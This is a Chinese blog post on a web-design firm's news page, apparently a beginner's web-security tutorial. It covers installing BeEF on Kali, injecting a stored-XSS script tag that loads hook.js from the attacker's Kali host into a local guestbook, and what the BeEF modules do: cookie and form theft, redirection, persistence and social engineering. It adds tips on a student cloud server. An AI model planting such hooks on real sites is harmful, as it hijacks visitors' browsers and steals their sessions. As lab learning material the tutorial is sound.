资讯动态

Web 安全入门三件套:BeEF XSS 攻击测试 + 白嫖阿里云服务器 + HTML 基础

发布时间:2026/9/7 19:31:12 来源:尧图企业网站定制
1.beef 上线 xss运行命令apt-getinstallbeef-xssapt-getupdateapt-getinstallbeef-xssapt-getinstallbeef-xss—fix-missingbeef-xss首次登入要修改密码输入账号密码初始账号为 beefkali 访问http://127.0.0.1:3000/ui/authentication开小皮在存储型 xss写入script srchttp://kali的 ip:3000/hook.js/script只要访问到了这个留言页面就可以在 kali 上线绿色对目标主机生效并且不可见(不会被发现)橙色对目标主机生效但可能可见(可能被发现)灰色对目标主机来未必生效(可验证下)红色对目标主机不生效比如弹个窗点那个 executeBrowser主要是针对浏览器的一些信息收集或攻击其下的子选项卡HookedDomain主要是获取HTTP属性值比如cookie、表单值等还可以做写简单的浏览器操作比如替换 href 值弹出警告框重定向浏览器等。这个选项卡下的有些模块会根据受害者的浏览器来决定是否显示。主要是浏览器通用操作和其他基本信息检测。Chrome extensions主要是针对谷歌浏览器扩展插件Debug调试功能Exploits漏洞利用主要利用一些已公开的漏洞进行攻击测试Host针对主机比如检测主机的浏览器、系统信息、IP 地址、安装软件等等IPEC协议间通信。主要是用来连接、控制受害者浏览器的MetasploitBeef 可通过配置和 metasploit 平台联合一旦有受害者出现可通过信息收集确定是否存在漏洞进一步方便 metasploit 攻击测试Misc杂项。Network网络扫描Persistence维护受害者访问Phonegap手机测试Social engineering社会工程学攻击2.网站服务器白嫖搭建阿里云先认证学生身份然后领取一个 300的优惠券用这个券开服务器系统选择 windows server 系列主要是看个人需求我选2022下个小皮搭建网站跟在小皮上搭本地流程一样最好是备案需要工信部和公安双备案3.html 基础

读完文章,也想定制专属网站?

尧图设计师 24 小时内与您沟通定制方案

免费获取报价